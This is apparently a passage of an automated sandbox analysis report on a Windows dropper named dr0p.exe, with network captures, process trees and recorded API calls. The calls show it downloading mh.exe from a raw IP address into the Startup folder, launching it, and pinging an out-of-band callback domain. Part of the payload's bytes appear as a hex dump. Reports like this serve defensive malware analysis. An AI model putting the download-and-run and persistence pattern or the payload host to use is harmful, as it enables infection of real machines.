    Jan 6, 2025 06:03:59.630207062 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.630222082 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.630228043 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.630263090 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.630263090 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.630342960 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.630352974 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.630362988 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.630378008 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.630378962 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.630389929 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.630397081 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.630399942 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.630410910 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.630420923 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.630422115 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.630431890 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.630443096 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.630453110 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.630470991 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.630645037 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.630664110 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.630676031 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.630686045 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.630711079 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.630743980 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.630755901 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.630765915 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.630775928 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.630784988 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.630790949 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.630795002 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.630805969 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.630826950 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.630827904 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.630857944 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.631036043 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631051064 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631078959 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.631114960 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.631151915 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631164074 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631172895 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631184101 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631192923 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631202936 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631206989 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.631215096 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631222010 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.631226063 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631236076 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631242990 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.631246090 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631268024 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.631289959 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.631479025 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631489038 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631499052 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631524086 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.631545067 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.631649971 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631659985 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631669998 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631675005 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631685019 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631695032 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631705999 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631707907 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.631716013 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631722927 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.631726980 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631743908 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631743908 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.631753922 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631766081 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631773949 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.631777048 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.631777048 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.631799936 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.631824017 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.631999969 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632010937 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632045031 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.632147074 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632157087 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632165909 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632177114 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632186890 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632188082 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.632196903 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632206917 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632209063 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.632217884 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632227898 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632237911 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632241011 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.632249117 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632256031 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.632258892 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632275105 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.632294893 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.632745981 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632755995 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632766962 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632776976 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632783890 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.632786989 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632797003 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632806063 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.632807016 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632817984 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632824898 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.632827997 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632838011 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632848024 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632855892 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.632858038 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632869005 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632874966 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.632879019 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632889032 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632894039 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.632900953 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632910013 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.632930040 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.632930994 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.632949114 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.633152008 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.633162022 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.633172989 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.633183002 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.633193016 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.633200884 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.633203983 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.633213997 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.633220911 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.633260012 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.633260012 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.719923019 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.719944954 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.719958067 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.719969034 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.719980001 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.719991922 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.720072031 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.720093966 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.720107079 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.720113039 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.720118046 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.720127106 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.720134020 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.720144033 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.720176935 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.720249891 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.720261097 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.720272064 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.720278978 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.720283031 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.720299006 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.720308065 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.720319033 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.720338106 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.720362902 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.720416069 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.720427036 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.720437050 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.720453978 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.720478058 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.720539093 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.720550060 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.720560074 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.720566988 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.720568895 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.720575094 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.720581055 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.720592976 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.720601082 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.720628977 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:04:01.777318001 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:04:37.509735107 CET6042853192.168.2.6162.159.36.2
    Jan 6, 2025 06:04:37.514574051 CET5360428162.159.36.2192.168.2.6
    Jan 6, 2025 06:04:37.514642954 CET6042853192.168.2.6162.159.36.2
    Jan 6, 2025 06:04:37.519498110 CET5360428162.159.36.2192.168.2.6
    Jan 6, 2025 06:04:37.987791061 CET6042853192.168.2.6162.159.36.2
    Jan 6, 2025 06:04:37.992758036 CET5360428162.159.36.2192.168.2.6
    Jan 6, 2025 06:04:37.992810965 CET6042853192.168.2.6162.159.36.2
    TimestampSource PortDest PortSource IPDest IP
    Jan 6, 2025 06:04:37.509177923 CET5356066162.159.36.2192.168.2.6
    Jan 6, 2025 06:04:38.372401953 CET53618781.1.1.1192.168.2.6
    • 23.27.51.244
    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    0192.168.2.64970923.27.51.244805412C:\Users\user\Desktop\dr0p.exe
    TimestampBytes transferredDirectionData
    Jan 6, 2025 06:03:57.674489975 CET94OUTGET /mh.exe HTTP/1.1
    User-Agent: Mozilla/5.0
    Host: 23.27.51.244
    Cache-Control: no-cache
    Jan 6, 2025 06:03:58.177469969 CET1236INHTTP/1.1 200 OK
    Date: Mon, 06 Jan 2025 05:03:58 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Last-Modified: Mon, 06 Jan 2025 04:27:52 GMT
    ETag: "1d3dc2-62b020d388200"
    Accept-Ranges: bytes
    Content-Length: 1916354
    Content-Type: application/x-msdos-program
    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 24 84 32 e2 60 e5 5c b1 60 e5 5c b1 60 e5 5c b1 d4 79 ad b1 68 e5 5c b1 d4 79 af b1 eb e5 5c b1 d4 79 ae b1 6d e5 5c b1 e0 9e a1 b1 62 e5 5c b1 e0 9e 58 b0 72 e5 5c b1 e0 9e 5f b0 6a e5 5c b1 e0 9e 59 b0 59 e5 5c b1 69 9d df b1 69 e5 5c b1 69 9d db b1 62 e5 5c b1 69 9d cf b1 67 e5 5c b1 60 e5 5d b1 43 e4 5c b1 ee 9e 59 b0 52 e5 5c b1 ee 9e 5c b0 61 e5 5c b1 ee 9e a3 b1 61 e5 5c b1 ee 9e 5e b0 61 e5 5c b1 52 69 63 68 60 e5 5c b1 00 00 00 00 00 00 00 00 50 45 00 00 64 86 08 00 23 97 40 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 21 00 68 04 00 00 38 03 00 00 00 00 00 e0 2e 03 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 [TRUNCATED]
    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$$2`\`\`\yh\y\ym\b\Xr\_j\YY\ii\ib\ig\`]C\YR\\a\a\^a\Rich`\PEd#@f"!h8.@`4P`l0p6T7(@ .textngh `.rdata(*l@@.data\@.pdatal02@@.didat`@_RDATA\@@.rsrc`@@.relocp@B
    Jan 6, 2025 06:03:58.177490950 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 8d 0d 39 b9 05 00 e9 10 8e 00 00 cc cc cc cc 48 8d 0d c9 f9 05 00 e9 b8 a4 00 00 cc cc cc cc 48 83 ec 28 48 8d 0d 35
    Data Ascii: H9HH(H5dHeH(HeH(jH(HjHelHe\H(HlHeH(8He,
    Jan 6, 2025 06:03:58.177501917 CET1236INData Raw: 01 00 00 48 8b 69 18 48 83 ca 07 45 33 e4 48 3b d3 77 11 48 8b cd 48 8b c3 48 d1 e9 48 2b c1 48 3b e8 76 10 48 b8 ff ff ff ff ff ff ff 7f 48 8d 0c 00 eb 31 48 8d 04 29 48 8b da 48 3b d0 48 0f 42 d8 48 b8 ff ff ff ff ff ff ff 7f 48 8d 4b 01 48 3b
    Data Ascii: HiHE3H;wHHHH+H;vHH1H)HH;HBHHKH;HHrLHHtIH_IK6LwLH fD$3Hr1HHmHrLAH'I+HAHw3IH7HH\$@Hl$HHt$PH|$XH A
    Jan 6, 2025 06:03:58.177511930 CET1236INData Raw: 48 83 ec 20 48 8b 19 48 85 db 74 49 48 8b 0b 48 85 c9 74 41 48 8b 53 10 48 2b d1 48 d1 fa 48 03 d2 48 81 fa 00 10 00 00 72 18 4c 8b 41 f8 48 83 c2 27 49 2b c8 48 8d 41 f8 48 83 f8 1f 77 1c 49 8b c8 e8 47 08 03 00 48 83 23 00 48 83 63 08 00 48 83
    Data Ascii: H HHtIHHtAHSH+HHHrLAH'I+HAHwIGH#HcHcH [&_@SH HHHtAHSH+HHHrLAH'I+HAHwIH#HcHcH [^H9HHH\$WH H
    Jan 6, 2025 06:03:58.177524090 CET1236INData Raw: 72 32 48 8d 14 55 02 00 00 00 48 8b 4d 00 48 8b c1 48 81 fa 00 10 00 00 72 15 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 77 28 e8 86 03 03 00 8a c3 48 8b 8d a0 00 00 00 48 33 cc e8 89 04 03 00 48 81 c4 b0 01 00 00 41 5f 41 5e 41 5d
    Data Ascii: r2HUHMHHrH'HIH+HHw(HH3HA_A^A]_^[]VZPZJZDZ@SVWHHH3H$HIHL$ HSugHd$8HD$pHd$XHL$0Hd$`HD$@H\$0H|$HD$PAHHt&HH_
    Jan 6, 2025 06:03:58.177536011 CET1236INData Raw: 72 ef ff ff 48 8d 74 24 30 8d 5d 01 eb 15 48 8b d0 48 8d 4c 24 50 e8 b7 00 00 00 48 8b f0 bb 02 00 00 00 48 89 2f 48 89 6f 10 48 89 6f 18 41 b8 20 00 00 00 48 8b d6 48 8b cf e8 db 12 03 00 48 89 6e 10 48 c7 46 18 07 00 00 00 66 89 2e 83 cb 04 f6
    Data Ascii: rHt$0]HHL$PHH/HoHoA HHHnHFf.tHL$Pt>HT$HHr3HUHL$0HHrH'HIH+HHw(?HHL$pH3CH$H_^]UH\$Ht$ WHpHjH3HD$hH
    Jan 6, 2025 06:03:58.177547932 CET1236INData Raw: dc 49 3b c4 48 0f 43 d8 48 89 5c 24 68 48 81 fb 00 10 00 00 72 12 48 8b cb e8 48 ea ff ff 48 8b f8 48 89 44 24 78 eb 23 33 ff 48 85 db 74 12 48 8b cb e8 9f f9 02 00 48 8b f8 48 89 44 24 78 eb 05 48 89 7c 24 78 48 89 5c 24 68 4c 03 f7 41 8a 45 00
    Data Ascii: I;HCH\$hHrHHHHD$x#3HtHHHD$xH|$xH\$hLAEAHVHLL;tIMFHVILMHH8IH A_A^A]A\_^[xH\$WHHH3H$HHafHn3HL$`D$ DB D$0
    Jan 6, 2025 06:03:58.177658081 CET1236INData Raw: 41 f8 48 83 f8 1f 0f 87 9d 00 00 00 49 8b c8 e8 2a f5 02 00 48 83 a7 30 14 00 00 00 48 c7 87 38 14 00 00 0f 00 00 00 c6 87 20 14 00 00 00 48 8d 8f 20 10 00 00 e8 88 03 00 00 48 8d 8f 80 0c 00 00 e8 7c 03 00 00 48 8d 8f 20 0c 00 00 e8 80 f2 ff ff
    Data Ascii: AHI*H0H8 H H|H H@`ZHLA!LPDBHOhHH\$0H _KH\$Ht$WH H3HHtIHH+HH;rLAH'I
    Jan 6, 2025 06:03:58.177669048 CET332INData Raw: 5c 24 30 48 83 c4 20 5f e9 35 86 01 00 cc 48 83 c1 48 e9 e7 ed ff ff cc cc cc 40 53 48 83 ec 20 48 8b 51 48 48 8b d9 48 83 fa 10 72 2d 48 8b 49 30 48 ff c2 48 81 fa 00 10 00 00 72 18 4c 8b 41 f8 48 83 c2 27 49 2b c8 48 8d 41 f8 48 83 f8 1f 77 1f
    Data Ascii: \$0H _5HH@SH HQHHHr-HI0HHrLAH'I+HAHwIHc@HCHC0H [FH\$WH H tHH\$0HH _@SH Hu'8iuHS@:(HXH [H
    Jan 6, 2025 06:03:58.177679062 CET1236INData Raw: 97 c0 eb 43 32 c0 eb 3f e8 f9 14 00 00 48 8b d0 45 33 c0 48 8b 46 20 48 8b cf ff 15 0a 52 04 00 48 8d 15 03 57 04 00 48 8b cf e8 57 3b 00 00 48 85 c0 74 11 48 8b d5 48 8b cf e8 d7 05 00 00 84 c0 74 02 b3 01 8a c3 48 8b 5c 24 30 48 8b 6c 24 38 48
    Data Ascii: C2?HE3HF HRHWHW;HtHHtH\$0Hl$8Ht$@H _\tHHHPuHHH\$Ht$WH VHHu27HH@(qQHHHH@E3HHA HJQ@H\$0Ht$8H _
    Jan 6, 2025 06:03:58.182389021 CET1236INData Raw: 00 b0 01 74 03 41 8a c7 88 87 59 14 00 00 eb 0a 83 f8 02 74 2e 83 f8 05 74 46 48 8b 07 45 33 c0 48 8b 97 48 14 00 00 48 8b cf 48 8b 40 20 ff 15 22 4d 04 00 48 8b cf e8 fa 31 00 00 48 85 c0 75 a5 eb 1d 44 38 bf 55 14 00 00 74 0b 44 38 bf 38 0d 00
    Data Ascii: tAYt.tFHE3HHHH@ "MH1HuD8UtD88tAYH@HHDHE3HHH@ LD8UtD8Yt&LG@HI;tIIxrIM@+s@Hy3HrO


    Click to jump to process

    Click to jump to process

    Click to jump to process

    Target ID:0
    Start time:00:03:52
    Start date:06/01/2025
    Path:C:\Users\user\Desktop\dr0p.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\Desktop\dr0p.exe"
    Imagebase:0x400000
    File size:602 bytes
    MD5 hash:D085F244D635D6E43546E63649EA2E67
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:true

    Target ID:3
    Start time:00:03:59
    Start date:06/01/2025
    Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe
    Wow64 process (32bit):false
    Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe"
    Imagebase:0x7ff741e90000
    File size:1'916'354 bytes
    MD5 hash:287EEBE03B7EC7488ED2AE07A5E98CF0
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Antivirus matches:
    • Detection: 43%, ReversingLabs
    Reputation:low
    Has exited:true

    Target ID:4
    Start time:00:03:59
    Start date:06/01/2025
    Path:C:\Windows\SysWOW64\cmd.exe
    Wow64 process (32bit):true
    Commandline:"C:\Windows\System32\cmd.exe" /c ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun
    Imagebase:0x1c0000
    File size:236'544 bytes
    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:5
    Start time:00:03:59
    Start date:06/01/2025
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff66e660000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:6
    Start time:00:04:00
    Start date:06/01/2025
    Path:C:\Windows\SysWOW64\PING.EXE
    Wow64 process (32bit):true
    Commandline:ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun
    Imagebase:0xe10000
    File size:18'944 bytes
    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:7
    Start time:00:04:00
    Start date:06/01/2025
    Path:C:\Users\user\Desktop\q.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\Desktop\q.exe" hm.exe
    Imagebase:0x400000
    File size:139'264 bytes
    MD5 hash:935809D393A2BF9F0E886A41FF5B98BE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Antivirus matches:
    • Detection: 0%, ReversingLabs
    Reputation:low
    Has exited:true

    Target ID:8
    Start time:00:04:00
    Start date:06/01/2025
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff66e660000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:10
    Start time:00:04:01
    Start date:06/01/2025
    Path:C:\Users\user\Desktop\hm.exe
    Wow64 process (32bit):false
    Commandline:"C:\Users\user\Desktop\hm.exe"
    Imagebase:0x760000
    File size:4'109'824 bytes
    MD5 hash:692D72923747BE1ED2C05CD6B4118BF4
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Antivirus matches:
    • Detection: 29%, ReversingLabs
    Reputation:low
    Has exited:false

    Target ID:11
    Start time:00:04:01
    Start date:06/01/2025
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff66e660000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Reset < >

      Execution Graph

      Execution Coverage:98.3%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:100%
      Total number of Nodes:18
      Total number of Limit Nodes:0

      Callgraph

      • Executed
      • Not Executed
      • Opacity -> Relevance
      • Disassembly available
      callgraph 0 Function_00420000 1 Function_0042006A 2 Function_004216B8

      Control-flow Graph

      APIs
      • InternetOpenA.WININET(Mozilla/5.0,00000000,00000000,00000000,00000000), ref: 0042008B
      • InternetOpenUrlA.WININET(00000000,http://23.27.51.244/mh.exe,00000000,00000000,84083000,00000000), ref: 004200A9
      • SHGetFolderPathA.SHELL32(00000000,00000007,00000000,00000000,?), ref: 004200C5
      • lstrcat.KERNEL32(?,0042019C), ref: 004200F2
      • lstrcat.KERNEL32(00000000), ref: 004200F5
      • CreateFileA.KERNELBASE(00000000), ref: 004200F8
      • InternetReadFile.WININET(00000000,?,00000800,00000000), ref: 00420113
      • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 0042012A
      • CloseHandle.KERNELBASE(00000000), ref: 0042013F
      • CloseHandle.KERNELBASE(00000000), ref: 00420142
      • CloseHandle.KERNELBASE(00000000), ref: 00420145
      • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000005), ref: 0042015C
      • ShellExecuteA.SHELL32(00000000,runas,cmd.exe,/c ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun,00000000,00000000), ref: 00420170
      • exit.MSVCRT ref: 00420173
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2157971429.0000000000420000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
